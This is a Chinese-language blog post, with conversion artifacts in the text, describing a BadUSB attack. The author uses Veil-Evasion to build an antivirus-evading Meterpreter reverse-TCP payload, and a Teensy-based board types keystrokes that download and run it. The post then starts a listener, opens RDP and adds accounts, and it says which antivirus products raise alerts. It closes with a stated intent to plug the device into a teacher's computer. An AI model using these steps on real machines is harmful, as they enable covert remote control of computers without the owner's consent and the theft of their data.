所用硬體裝置為燒鵝,燒鵝是RadioWar基于Teensy++ 2.0 AT90USB1286晶片設計的USB Rubber Ducky類開發闆。
使用veil編碼meterpreter生成payload(經過編碼的payload在殺軟中僅能夠存活幾分鐘),放到伺服器上。插入燒鵝,模拟鍵盤輸入,在cmd中下載下傳payload,并執行。
0x1 利用veil編碼打造免殺的meterpreter
root@kali:~# veil-evasion //啟動veil
[>] Please enter a command: list //檢視可選清單
26) python/meterpreter/rev_tcp

[>] Please enter a command: 26 //這裡選擇編号為26的payload
[>] Please enter a command: set LHOST 192.168.31.233 //設定LHOST
[>] Please enter a command: generate //對payload進行編碼
[*] Press [enter] for 'payload'
[>] Please enter the base name for output files: a //輸入生成的payload名字
[>] Please enter the number of your choice: 1 //選擇編碼方式
[*] Executable written to: /root/veil-output/compiled/a1.exe //生成經過編碼的payload位置
0x2 将執行代碼寫入badusb中
使用Arduino IDE 寫入,其中下載下傳使用的是PowerShell,如果使用vbs那種方法,360會報警
對于win7開啟3389,并加帳戶,使用
在學校中利用3389比meterpreter更加好用。開啟3389,殺軟不會提示。添加帳戶,360會提示,電腦管家不會提示。
對于執行修改dns等一些需要輸入中文的地方,就比較麻煩了,暫時還沒想到好的方法,隻想到模拟鍵盤輸入 Shift + Ctrl開啟輸入法....利用條件比較苛刻
0x3 等待目标連接配接
msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4444 E //開始監聽,等待連接配接
将USB插入目标機器,執行相關指令
目标機器上線
PS:玩法還有很多,還可以開啟目标機器3389,建立使用者等等,快要期末考試了,不要攔着我,我要去插下老師的機器......